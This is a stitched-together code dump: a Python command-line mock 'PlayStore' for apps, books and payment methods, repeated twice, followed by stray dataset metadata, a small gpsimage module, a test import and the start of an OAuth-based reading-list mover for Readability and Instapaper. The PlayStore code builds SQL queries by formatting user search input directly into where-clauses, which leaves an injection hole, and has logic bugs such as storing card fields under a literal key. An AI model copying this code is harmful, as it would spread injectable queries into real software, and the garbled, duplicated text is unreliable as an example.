s = db.get("app", "appname, appid", where="name='{}'".format(a9["search"]), output=False)
apps = db.display_query(s, output=False)
if apps == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
else:
for i in a4["install"]:
s = db.download(a1["userid"], apps[i])
if not s:
puts(
colored.red(
"{} is a paid app, you have to pay to download it".format(i)
)
)
a6 = prompt(q6, style=style)
pays = {}
if a6["buy"]:
for j in ("debitcard", "creditcard", "ewallet", "netbanking"):
q7[0]["choices"].append(Separator("= {} =".format(j)))
payments = db.get_payment(a1["userid"], j, False)
payments = dict(payments)
for k in payments.keys():
q7[0]["choices"].append({"name": k})
pays.update(dict(payments))
a7 = prompt(q7, style=style)
s = db.download(a1["userid"], apps[i], pays.get(a7["payment"]))
if s:
puts(colored.green("{} downloaded successfully.".format(i)))
else:
puts(colored.red("download of {} failed. may be because your card has been expired".format(i)))
else:
puts(colored.green("{} downloaded successfully.".format(i)))
elif a2["option"] in dcommand:
apps = db.downloaded_app(a1["userid"], True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
q4[0]["message"] = "Select app you want to {}".format(a2["option"])
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
elif a2["option"] == "Feedback":
for i in a4["install"]:
puts(colored.green(i))
a8 = prompt(q8, style=style)
db.feedback(a1["userid"], apps[i], a8["rating"], a8["comment"])
else:
for i in a4["install"]:
s = db.download(a1["userid"], apps[i], install=dcommand[a2["option"]])
puts(colored.green("{} {}ed successfully.".format(i, a2["option"])))
elif a2["option"] == "Wishlist":
q3 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [
{"name": "remove wishlisted apps"},
{"name": "trending apps"},
{"name": "best rated apps"},
{"name": "category wise apps"},
{"name": "search apps"}
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select app you want to add to/(remove from) wishlist ",
"name": "install",
"choices": [],
}
]
a3 = prompt(q3, style=style)
if a3["option"] == "remove wishlisted apps":
apps = db.get_wishlist(a1["userid"], True, False)
if apps == []:
puts(colored.red("Your wishlist is empty!"))
sys.exit()
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "trending apps":
apps = db.trending(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "best rated apps":
apps = db.best_rated(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "category wise apps":
cats = db.get_category()
for i in itertools.chain.from_iterable(cats):
q5[0]["choices"].append({"name": i})
a5 = prompt(q5, style=style)
for i in a5["category"]:
apps = db.category_wise(i, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the app",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("app", "appname, appid", where="name='{}'".format(a9["search"]), output=False)
apps = db.display_query(s, output=False)
if apps == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
elif a3["option"] == "remove wishlisted apps":
for i in a4["install"]:
db.remove_wishlist(a1["userid"], apps[i])
puts(colored.green("{} removed from wishlist successfully.".format(i)))
else:
for i in a4["install"]:
s = db.wishlist(a1["userid"], apps[i])
if not s:
puts(colored.red("App can't be added to wishlist because app is already downloaded/wishlisted."))
else:
puts(colored.green("{} added to wishlist successfully.".format(i)))
elif a1["product"] == "Book":
q2 = [
{
"type": "list",
"message": "Select category from which you want to show/purchase book.",
"name": "option",
"choices": [
{"name": "wishlisted books"},
{"name": "best rated books"},
{"name": "genre wise books"},
{"name": "my library"},
{"name": "search books"},
{"name": "wishlist books"},
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q3 = [
{
"type": "checkbox",
"message": "Select book you want to purchase",
"name": "purchase",
"choices": [],
}
]
q4 = [
{
"type": "checkbox",
"message": "Select genre from which you want to purchase book",
"name": "genre",
"choices": [],
}
]
q6 = [
{
"type": "confirm",
"name": "buy",
"message": "Do you want to buy the app?",
"default": False,
}
]
q7 = [
{
"type": "list",
"message": "Select payment method",
"name": "payment",
"choices": [],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q8 = [
{
"type": "list",
"message": "Enter rating",
"name": "rating",
"choices": ['1', '2', '3', '4', '5'],
},
{
"type": "input",
"message": "Give Review",
"name": "comment",
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "wishlisted books":
books = db.get_wishlist(a1["userid"], False, False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any book in wishlisted books!"
)
)
sys.exit()
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "best rated books":
books = db.best_rated(False, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "genre wise books":
cats = db.get_genre()
for i in itertools.chain.from_iterable(cats):
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
for i in a4["genre"]:
books = db.genre_wise(i, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "my library":
books = db.downloaded_book(a1["userid"], False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any books in your library!"
)
)
sys.exit()
q3[0]["message"] = "Select books if you want to give feedback"
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
if a3["purchase"] != []:
for i in a3["purchase"]:
puts(colored.green(i))
a8 = prompt(q8, style=style)
s = db.feedback(a1["userid"], books[i], a8["rating"], a8["comment"])
print(s)
sys.exit()
elif a2["option"] == "search books":
q9 = [
{
"type": "input",
"message": "Enter name of the book",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("book", "name, isbn", where="name='{}'".format(a9["search"]), output=False)
books = db.display_query(s, output=False)
if books == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
else:
q2 = [
{
"type": "list",
"message": "Select category from which you want to wishlist/unwishlist book.",
"name": "option",
"choices": [
{"name": "remove wishlisted books"},
{"name": "best rated books"},
{"name": "genre wise books"},
{"name": "search books"}
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select book you want to add to wishlist",
"name": "purchase",
"choices": [],
}
]
q3 = [
{
"type": "checkbox",
"message": "Select genre from which you want to add book to your wishlist",
"name": "category",
"choices": [],
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "remove wishlisted books":
books = db.get_wishlist(a1["userid"], False, False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any book in wishlisted books!"
)
)
sys.exit()
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "best rated books":
books = db.best_rated(False, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "genre wise books":
cats = db.get_genre()
for i in itertools.chain.from_iterable(cats):
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
for i in a4["genre"]:
books = db.genre_wise(i, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the book",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("book", "name, isbn", where="name='{}'".format(a9["search"]), output=False)
books = db.display_query(s, output=False)
if books == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
if a3["purchase"] == []:
puts(colored.red("You have to select at least one book."))
else:
for i in a3["purchase"]:
s = db.wishlist(a1["userid"], books[i], False)
if not s:
puts(colored.red("Book can't be added to wishlist because book is already downloaded/wishlisted."))
else:
puts(colored.green("{} added to wishlist successfully.".format(i)))
sys.exit()
if a3["purchase"] == []:
puts(colored.red("You have to select at least one book."))
else:
for i in a3["purchase"]:
s = db.download(a1["userid"], books[i], isApp=False)
if not s:
puts(
colored.red(
"{} is a paid book, you have to pay to download it".format(i)
)
)
a6 = prompt(q6, style=style)
pays = {}
if a6["buy"]:
for j in ("debitcard", "creditcard", "ewallet", "netbanking"):
q7[0]["choices"].append(Separator("= {} =".format(j)))
payments = db.get_payment(a1["userid"], j, False)
payments = dict(payments)
for k in payments.keys():
q7[0]["choices"].append({"name": k})
pays.update(dict(payments))
a7 = prompt(q7, style=style)
s = db.download(a1["userid"], books[i], pays.get(a7["payment"]), isApp=False)
print(s)
if s:
puts(colored.green("{} added to your library successfully.".format(i)))
else:
puts(colored.green("{} added to your library successfully.".format(i)))
elif a1["product"] == "Account":
q2 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": ["add payment method", "edit user details", "delete account"],
}
]
q3 = [
{
"type": "list",
"message": "Select payment method you want to add",
"name": "option",
"choices": ["credit card", "debit card", "ewallet", "netbanking"],
}
]
q4 = [
{
"type": "checkbox",
"message": "Select fields you want to update",
"name": "option",
"choices": ["userid", "username", "country", "autoupdate"]
}
]
q6 = [
{
"type": "confirm",
"message": "Are you sure you want to delete your account.",
"name": "option",
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "add payment method":
a3 = prompt(q3, style=style)
d = {}
if a3["option"] in {"credit card", "debit card"}:
for i in ("name", "expdate", "cardno"):
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
d.update(i=a5["option"])
db.add_card(d["name"], a1["userid"], d["expdate"], d["cardno"], "".join(a3["option"].split()))
elif a3["option"] == "ewallet":
for i in ("name", "walletid"):
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
d.update(i=a5["option"])
db.add_wallet(a1["userid"], d["name"], d["walletid"])
else:
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format("bank name")
a5 = prompt(q5, style=style)
db.add_netbank(a1["userid"], a5["option"])
elif a2["option"] == "edit user details":
a4 = prompt(q4, style=style)
if a4["option"] != []:
ans = []
for i in a4["option"]:
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
ans.append(a5["option"])
kwargs = dict([a4["option"], ans])
db.update("users", "userid='{}'".format(a1["userid"]), **kwargs)
else:
a6 = prompt(q6, style=style)
if a6["option"]:
db.delete("users", userid=a1["userid"])
| from __future__ import print_function, unicode_literals
import itertools
import sys
from clint.textui import colored, indent, puts
from pyfiglet import figlet_format as figlet
from PyInquirer import Separator, Token, prompt, style_from_dict
from playstore import PlayStore
def convert(val, ans):
if "int" in val:
return int(ans)
elif "numeric" in val:
return float(ans)
elif "bool" == val:
return True if ans == "true" else False
else:
return ans
db = PlayStore()
puts(colored.green(figlet("PlayStore")))
style = style_from_dict(
{
Token.Separator: "#<PASSWORD>",
Token.QuestionMark: "#<PASSWORD>",
Token.Selected: "#<PASSWORD>", # default
Token.Pointer: "#<PASSWORD> bold",
Token.Instruction: "#<PASSWORD>", # default
Token.Answer: "#<PASSWORD> bold",
Token.Question: "#<PASSWORD>",
}
)
q1 = [
{
"type": "input",
"message": "Enter your userid (email)",
"name": "userid",
"validate": lambda text: len(text) != 0 or "Enter a valid userid",
},
{
"type": "list",
"message": "Select option",
"name": "product",
"choices": [{"name": "App"}, {"name": "Book"}, {"name": "Account"}],
"validate": lambda answer: "You must choose a product."
if len(answer) == 0
else True,
},
]
a1 = prompt(q1, style=style)
if a1["product"] == "App":
q2 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [{"name": "Install"}, {"name": "Update"}, {"name": "Uninstall"}, {"name": "Wishlist"}],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q3 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [
{"name": "previously installed apps"},
{"name": "wishlisted apps"},
{"name": "trending apps"},
{"name": "best rated apps"},
{"name": "category wise apps"},
{"name": "search apps"},
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select app you want to install",
"name": "install",
"choices": [],
}
]
q5 = [
{
"type": "checkbox",
"message": "Select category from which you want to install app",
"name": "category",
"choices": [],
}
]
q6 = [
{
"type": "confirm",
"name": "buy",
"message": "Do you want to buy the app?",
"default": False,
}
]
q7 = [
{
"type": "list",
"message": "Select payment method",
"name": "payment",
"choices": [],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q8 = [
{
"type": "list",
"message": "Enter rating",
"name": "rating",
"choices": [1, 2, 3, 4, 5],
},
{
"type": "input",
"message": "Give Review",
"name": "comment",
}
]
dcommand = {"Uninstall": False, "Update": True, "Feedback": True}
a2 = prompt(q2, style=style)
if a2["option"] == "Install":
a3 = prompt(q3, style=style)
if a3["option"] == "previously installed apps":
apps = db.downloaded_app(a1["userid"], False, False)
apps = dict(apps)
if apps == {}:
puts(
colored.red(
"You don't have any app in previously installed apps!"
)
)
sys.exit()
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "wishlisted apps":
apps = db.get_wishlist(a1["userid"], True, False)
apps = dict(apps)
if apps == {}:
puts(
colored.red(
"You don't have any app in wishlisted apps!"
)
)
sys.exit()
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "trending apps":
apps = db.trending(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "best rated apps":
apps = db.best_rated(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "category wise apps":
cats = db.get_category()
for i in itertools.chain.from_iterable(cats):
q5[0]["choices"].append({"name": i})
a5 = prompt(q5, style=style)
for i in a5["category"]:
apps = db.category_wise(i, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the app",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("app", "appname, appid", where="name='{}'".format(a9["search"]), output=False)
apps = db.display_query(s, output=False)
if apps == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
else:
for i in a4["install"]:
s = db.download(a1["userid"], apps[i])
if not s:
puts(
colored.red(
"{} is a paid app, you have to pay to download it".format(i)
)
)
a6 = prompt(q6, style=style)
pays = {}
if a6["buy"]:
for j in ("debitcard", "creditcard", "ewallet", "netbanking"):
q7[0]["choices"].append(Separator("= {} =".format(j)))
payments = db.get_payment(a1["userid"], j, False)
payments = dict(payments)
for k in payments.keys():
q7[0]["choices"].append({"name": k})
pays.update(dict(payments))
a7 = prompt(q7, style=style)
s = db.download(a1["userid"], apps[i], pays.get(a7["payment"]))
if s:
puts(colored.green("{} downloaded successfully.".format(i)))
else:
puts(colored.red("download of {} failed. may be because your card has been expired".format(i)))
else:
puts(colored.green("{} downloaded successfully.".format(i)))
elif a2["option"] in dcommand:
apps = db.downloaded_app(a1["userid"], True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
q4[0]["message"] = "Select app you want to {}".format(a2["option"])
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
elif a2["option"] == "Feedback":
for i in a4["install"]:
puts(colored.green(i))
a8 = prompt(q8, style=style)
db.feedback(a1["userid"], apps[i], a8["rating"], a8["comment"])
else:
for i in a4["install"]:
s = db.download(a1["userid"], apps[i], install=dcommand[a2["option"]])
puts(colored.green("{} {}ed successfully.".format(i, a2["option"])))
elif a2["option"] == "Wishlist":
q3 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [
{"name": "remove wishlisted apps"},
{"name": "trending apps"},
{"name": "best rated apps"},
{"name": "category wise apps"},
{"name": "search apps"}
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select app you want to add to/(remove from) wishlist ",
"name": "install",
"choices": [],
}
]
a3 = prompt(q3, style=style)
if a3["option"] == "remove wishlisted apps":
apps = db.get_wishlist(a1["userid"], True, False)
if apps == []:
puts(colored.red("Your wishlist is empty!"))
sys.exit()
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "trending apps":
apps = db.trending(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "best rated apps":
apps = db.best_rated(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "category wise apps":
cats = db.get_category()
for i in itertools.chain.from_iterable(cats):
q5[0]["choices"].append({"name": i})
a5 = prompt(q5, style=style)
for i in a5["category"]:
apps = db.category_wise(i, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the app",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("app", "appname, appid", where="name='{}'".format(a9["search"]), output=False)
apps = db.display_query(s, output=False)
if apps == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
elif a3["option"] == "remove wishlisted apps":
for i in a4["install"]:
db.remove_wishlist(a1["userid"], apps[i])
puts(colored.green("{} removed from wishlist successfully.".format(i)))
else:
for i in a4["install"]:
s = db.wishlist(a1["userid"], apps[i])
if not s:
puts(colored.red("App can't be added to wishlist because app is already downloaded/wishlisted."))
else:
puts(colored.green("{} added to wishlist successfully.".format(i)))
elif a1["product"] == "Book":
q2 = [
{
"type": "list",
"message": "Select category from which you want to show/purchase book.",
"name": "option",
"choices": [
{"name": "wishlisted books"},
{"name": "best rated books"},
{"name": "genre wise books"},
{"name": "my library"},
{"name": "search books"},
{"name": "wishlist books"},
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q3 = [
{
"type": "checkbox",
"message": "Select book you want to purchase",
"name": "purchase",
"choices": [],
}
]
q4 = [
{
"type": "checkbox",
"message": "Select genre from which you want to purchase book",
"name": "genre",
"choices": [],
}
]
q6 = [
{
"type": "confirm",
"name": "buy",
"message": "Do you want to buy the app?",
"default": False,
}
]
q7 = [
{
"type": "list",
"message": "Select payment method",
"name": "payment",
"choices": [],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q8 = [
{
"type": "list",
"message": "Enter rating",
"name": "rating",
"choices": ['1', '2', '3', '4', '5'],
},
{
"type": "input",
"message": "Give Review",
"name": "comment",
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "wishlisted books":
books = db.get_wishlist(a1["userid"], False, False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any book in wishlisted books!"
)
)
sys.exit()
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "best rated books":
books = db.best_rated(False, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "genre wise books":
cats = db.get_genre()
for i in itertools.chain.from_iterable(cats):
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
for i in a4["genre"]:
books = db.genre_wise(i, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "my library":
books = db.downloaded_book(a1["userid"], False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any books in your library!"
)
)
sys.exit()
q3[0]["message"] = "Select books if you want to give feedback"
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
if a3["purchase"] != []:
for i in a3["purchase"]:
puts(colored.green(i))
a8 = prompt(q8, style=style)
s = db.feedback(a1["userid"], books[i], a8["rating"], a8["comment"])
print(s)
sys.exit()
elif a2["option"] == "search books":
q9 = [
{
"type": "input",
"message": "Enter name of the book",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("book", "name, isbn", where="name='{}'".format(a9["search"]), output=False)
books = db.display_query(s, output=False)
if books == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
else:
q2 = [
{
"type": "list",
"message": "Select category from which you want to wishlist/unwishlist book.",
"name": "option",
"choices": [
{"name": "remove wishlisted books"},
{"name": "best rated books"},
{"name": "genre wise books"},
{"name": "search books"}
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select book you want to add to wishlist",
"name": "purchase",
"choices": [],
}
]
q3 = [
{
"type": "checkbox",
"message": "Select genre from which you want to add book to your wishlist",
"name": "category",
"choices": [],
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "remove wishlisted books":
books = db.get_wishlist(a1["userid"], False, False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any book in wishlisted books!"
)
)
sys.exit()
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "best rated books":
books = db.best_rated(False, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "genre wise books":
cats = db.get_genre()
for i in itertools.chain.from_iterable(cats):
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
for i in a4["genre"]:
books = db.genre_wise(i, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the book",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("book", "name, isbn", where="name='{}'".format(a9["search"]), output=False)
books = db.display_query(s, output=False)
if books == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
if a3["purchase"] == []:
puts(colored.red("You have to select at least one book."))
else:
for i in a3["purchase"]:
s = db.wishlist(a1["userid"], books[i], False)
if not s:
puts(colored.red("Book can't be added to wishlist because book is already downloaded/wishlisted."))
else:
puts(colored.green("{} added to wishlist successfully.".format(i)))
sys.exit()
if a3["purchase"] == []:
puts(colored.red("You have to select at least one book."))
else:
for i in a3["purchase"]:
s = db.download(a1["userid"], books[i], isApp=False)
if not s:
puts(
colored.red(
"{} is a paid book, you have to pay to download it".format(i)
)
)
a6 = prompt(q6, style=style)
pays = {}
if a6["buy"]:
for j in ("debitcard", "creditcard", "ewallet", "netbanking"):
q7[0]["choices"].append(Separator("= {} =".format(j)))
payments = db.get_payment(a1["userid"], j, False)
payments = dict(payments)
for k in payments.keys():
q7[0]["choices"].append({"name": k})
pays.update(dict(payments))
a7 = prompt(q7, style=style)
s = db.download(a1["userid"], books[i], pays.get(a7["payment"]), isApp=False)
print(s)
if s:
puts(colored.green("{} added to your library successfully.".format(i)))
else:
puts(colored.green("{} added to your library successfully.".format(i)))
elif a1["product"] == "Account":
q2 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": ["add payment method", "edit user details", "delete account"],
}
]
q3 = [
{
"type": "list",
"message": "Select payment method you want to add",
"name": "option",
"choices": ["credit card", "debit card", "ewallet", "netbanking"],
}
]
q4 = [
{
"type": "checkbox",
"message": "Select fields you want to update",
"name": "option",
"choices": ["userid", "username", "country", "autoupdate"]
}
]
q6 = [
{
"type": "confirm",
"message": "Are you sure you want to delete your account.",
"name": "option",
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "add payment method":
a3 = prompt(q3, style=style)
d = {}
if a3["option"] in {"credit card", "debit card"}:
for i in ("name", "expdate", "cardno"):
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
d.update(i=a5["option"])
db.add_card(d["name"], a1["userid"], d["expdate"], d["cardno"], "".join(a3["option"].split()))
elif a3["option"] == "ewallet":
for i in ("name", "walletid"):
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
d.update(i=a5["option"])
db.add_wallet(a1["userid"], d["name"], d["walletid"])
else:
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format("bank name")
a5 = prompt(q5, style=style)
db.add_netbank(a1["userid"], a5["option"])
elif a2["option"] == "edit user details":
a4 = prompt(q4, style=style)
if a4["option"] != []:
ans = []
for i in a4["option"]:
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
ans.append(a5["option"])
kwargs = dict([a4["option"], ans])
db.update("users", "userid='{}'".format(a1["userid"]), **kwargs)
else:
a6 = prompt(q6, style=style)
if a6["option"]:
db.delete("users", userid=a1["userid"])
| fi | 0.049314 | # default # default | 3.105864 | 3 |
gpsimage/api.py | dima-kov/gpsimage | 4 | 6617383 | <reponame>dima-kov/gpsimage
#!/usr/bin/python
# coding: utf8
from .base import GPSImage
def open(path):
"""Open GPSImage
:param ``image``: Image filepath
"""
return GPSImage(path) | #!/usr/bin/python
# coding: utf8
from .base import GPSImage
def open(path):
"""Open GPSImage
:param ``image``: Image filepath
"""
return GPSImage(path) | en | 0.299711 | #!/usr/bin/python # coding: utf8 Open GPSImage :param ``image``: Image filepath | 2.112419 | 2 |
Trakttv.bundle/Contents/Tests/tests/helpers/__init__.py | disrupted/Trakttv.bundle | 1,346 | 6617384 | from tests.helpers.io import *
| from tests.helpers.io import *
| none | 1 | 1.049776 | 1 | |
main.py | ricardochavezt/reading-list-mover | 0 | 6617385 | <reponame>ricardochavezt/reading-list-mover<filename>main.py
import sys
import json
import urllib.request, urllib.error, urllib.parse
import simplejson
from xml.dom.minidom import parseString
import xml.dom.minidom
import oauth2
import configparser
from io import StringIO
import gzip
class OAuthClient:
def __init__(self, key, secret, user, password):
consumer = oauth2.Consumer(key, secret)
client = oauth2.Client(consumer)
resp, content = client.request(self.token_url, "POST", urllib.parse.urlencode({
'x_auth_mode': 'client_auth',
'x_auth_username': user,
'x_auth_password': password
}))
token = dict(urllib.parse.parse_qsl(content.decode('UTF-8')))
token = oauth2.Token(token['oauth_token'], token['oauth_token_secret'])
self.http = oauth2.Client(consumer, token)
def getBookmarks(self):
response, data = self.http.request(self.get_url, method='GET')
bookmarks = []
jsonData = simplejson.loads(data)
for b in simplejson.loads(data)['bookmarks']:
article = b['article']
bookmarks.append({'url' : article['url'], 'title' : article['title']})
return bookmarks
def addBookmark(self, bookmark):
self.http.request(self.add_url, method='POST', body=urllib.parse.urlencode({
'url': bookmark['url'],
'title': bookmark['title'].encode('utf-8')
}))
class Readability(OAuthClient):
def __init__(self, key, secret, user, password):
self.token_url = 'https://www.readability.com/api/rest/v1/oauth/access_token/'
self.get_url = 'https://www.readability.com/api/rest/v1/bookmarks'
self.add_url = 'https://www.readability.com/api/rest/v1/bookmarks'
OAuthClient.__init__(self, key, secret, user, password)
class Instapaper(OAuthClient):
def __init__(self, key, secret, user, password):
self.token_url = 'https://www.instapaper.com/api/1/oauth/access_token'
